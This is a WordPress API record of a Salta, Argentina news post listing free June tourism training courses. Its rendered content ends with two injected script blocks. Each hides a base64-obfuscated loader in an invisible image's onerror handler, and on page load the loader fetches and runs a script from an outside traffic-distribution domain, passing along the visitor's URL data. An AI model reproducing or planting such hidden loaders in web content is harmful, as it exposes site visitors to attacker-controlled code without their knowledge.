{"id":4066,"date":"2024-06-04T10:11:32","date_gmt":"2024-06-04T13:11:32","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4066"},"modified":"2025-08-13T23:55:15","modified_gmt":"2025-08-14T02:55:15","slug":"este-mes-continuaran-las-capacitaciones-gratuitas-para-prestadores-turisticos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4066","title":{"rendered":"Este mes continuar\u00e1n las capacitaciones gratuitas para prestadores tur\u00edsticos"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-04c701720124ad084d464238e39d401e\" style=\"background-color:#87054a\"><em>En el marco del Plan Integral de Capacitaci\u00f3n, el Ministerio de Turismo y Deportes pone a disposici\u00f3n del sector p\u00fablico y privado del \u00e1mbito tur\u00edstico, cursos gratuitos de modalidad presencial, virtual y asincr\u00f3nica.<\/em><\/h3>\n\n\n\n<p>El Ministerio de Turismo y Deportes de Salta, a trav\u00e9s del Plan Integral de Capacitaci\u00f3n: Hacia un destino sostenible brindar\u00e1 capacitaciones gratuitas de formaci\u00f3n para prestadores tur\u00edsticos. Para informes e inscripciones dirigirse a&nbsp;capacitacion@turismosalta.gov.ar.<\/p>\n\n\n\n<p>El sector p\u00fablico y privado vinculado a la actividad podr\u00e1n acceder durante el mes de junio a los siguientes cursos gratuitos de modalidades presenciales, virtuales y asincr\u00f3nicas:<\/p>\n\n\n\n<p>\u00b7Tips para emprender en turismo con \u00e9xito: hasta el 6 de junio. Dictado por Marcela Paz, destinado a emprendedores tur\u00edsticos. Asincr\u00f3nico.<\/p>\n\n\n\n<p>\u00b7Ferias con identidad: 3, 10 y 24 de junio. Dictado por Marcela Ruiz, destinado a referentes e informantes municipales de turismo. Asincr\u00f3nico.<\/p>\n\n\n\n<p>\u00b7Portugu\u00e9s para el Turismo (Nivel Inicial): del 3 al 27 de junio. Dictado por Instituto Salte\u00f1o de Idioma, destinado a gu\u00edas y prestadores de turismo. Virtual.<\/p>\n\n\n\n<p>\u00b7&nbsp;Formaci\u00f3n de sensibilizadores en observaci\u00f3n de aves: 4 y 5 de junio en la localidad de Met\u00e1n. Dictado por Javier Arias y Felipe Usandivaras, destinado a prestadores de turismo. Presencial.<\/p>\n\n\n\n<p>\u00b7Artesanos de recuerdos: del 6 al 13 de junio. Dictado por Franco Torres, destinado a emprendedores tur\u00edsticos. Asincr\u00f3nico.<\/p>\n\n\n\n<p>\u00b7Liderazgo con resultados: 7 de junio en la localidad de Tartagal. Dictado por la C\u00e1mara Hotelera y Gastron\u00f3mica de Salta, destinado a empresarios hoteleros. Presencial.<\/p>\n\n\n\n<p>\u00b7Desarrollo de competencias para construir equipos efectivos: 7 de junio en la localidad de Tartagal. Dictado por la C\u00e1mara Hotelera y Gastron\u00f3mica de Salta, destinado a empresarios hoteleros. Presencial.<\/p>\n\n\n\n<p>\u00b7Primeros Auxilios: 7 de junio en la localidad de Cafayate. Dictado por el Dr. Rodolfo Pastore, destinado a gu\u00edas y prestadores de turismo. Presencial.<\/p>\n\n\n\n<p>\u00b7Portugu\u00e9s para el Turismo (Nivel Avanzado): 7, 14 y 28 de junio. Dictado por Instituto Salte\u00f1o de Idioma, destinado a gu\u00edas y prestadores de turismo. Virtual.<\/p>\n\n\n\n<p>\u00b7Turismo y Patrimonio Cultural: 10 de junio en la localidad de La Vi\u00f1a. Dictado por Conicet-UNAS, destinado a prestadores del sector tur\u00edstico. Presencial.<\/p>\n\n\n\n<p>\u00b7Claves para recibir hu\u00e9spedes extranjeros: 13 de junio. Dictado por Clarisa Rodr\u00edguez (Feghra), destinado a empresarios hoteleros. Virtual.<\/p>\n\n\n\n<p>\u00b7Ideas pr\u00e1cticas para un turismo sostenible: del 13 al 20 de junio. Dictado por Marcelo Molinillo, destinado a emprendedores tur\u00edsticos. Virtual.<\/p>\n\n\n\n<p>\u00b7Primeros Auxilios: 14 de junio en Alfarcito. Dictado por Dr. Rodolfo Pastore, destinado a la Comunidad educativa Alfarcito. Presencial.<\/p>\n\n\n\n<p>\u00b7Turismo y Patrimonio Cultural: 25 de junio. Dictado por Conicet-UNSA, destinado a prestadores del sector tur\u00edstico. Virtual.<\/p>\n\n\n\n<p>\u00b7\u00bfQuer\u00e9s ser parte del Turismo de Reuniones?: 26 de junio. Dictado por Carlos Riob\u00f3, destinado a prestadores del sector tur\u00edstico. Virtual.<\/p>\n\n\n\n<p>\u00b7Primeros Auxilios: 27 y 28 de junio en la localidad de Cachi. Dictado por el Dr. Rodolfo Pastore, destinado a gu\u00edas y prestadores de turismo. Presencial.<\/p>\n\n\n\n<p>\u00b7\u00bfQuer\u00e9s ser parte del Turismo Astron\u00f3mico?: 27 al 29 de junio en Salta Capital. Dictado por Beatriz Garc\u00eda, destinado a gu\u00edas y prestadores de turismo. Presencial.<\/p>\n\n\n\n<p>\u00b7C\u00f3mo me presento al mundo digital: del 27 de junio al 4 de julio. Dictado por Nelson Velizan, destinado a emprendedores tur\u00edsticos. Asincr\u00f3nico.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/este-mes-continuaran-las-capacitaciones-gratuitas-para-prestadores-turisticos-95921\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco del Plan Integral de Capacitaci\u00f3n, el Ministerio de Turismo y Deportes pone a disposici\u00f3n del sector p\u00fablico y privado del \u00e1mbito tur\u00edstico, cursos gratuitos de modalidad presencial, virtual y asincr\u00f3nica. El Ministerio de Turismo y Deportes de Salta, a trav\u00e9s del Plan Integral de Capacitaci\u00f3n: Hacia un destino sostenible brindar\u00e1 capacitaciones gratuitas [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4067,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,15],"tags":[],"class_list":{"0":"post-4066","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4066"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4066"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4066\/revisions"}],"predecessor-version":[{"id":6776,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4066\/revisions\/6776"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4067"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4066"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4066"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4066"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}